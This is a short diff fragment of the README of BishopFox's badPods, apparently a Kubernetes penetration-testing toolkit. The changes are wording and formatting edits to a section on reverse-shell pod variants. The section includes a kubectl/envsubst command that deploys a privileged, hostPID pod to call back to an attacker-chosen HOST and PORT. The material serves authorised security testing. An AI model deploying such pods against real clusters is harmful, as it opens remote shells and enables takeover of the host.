BishopFox/badPods/README.md

 kubectl apply -f ./yaml/hostipc-only/pod-hostipc-only.yaml
 ```

-### Reverse Shell version of each pod
+### Reverse shell version of each pod
 If you can create pods but not exec  into them, you can use the reverse shell version of each pod.
-To avoid having to edit each pod with your host and port, you can environment variables and the envsubst command.
-Remember to spin up all of your listeners first:
+To avoid having to edit each pod with your host and port, you can environment variables and the `envsubst` command.
+Remember to spin up all of your listeners first!

 ```bash
 HOST="10.0.0.1" PORT="3111" envsubst < ./yaml/priv-and-hostpid/pod-priv-and-hostpid-revshell.yaml | kubectl apply -f -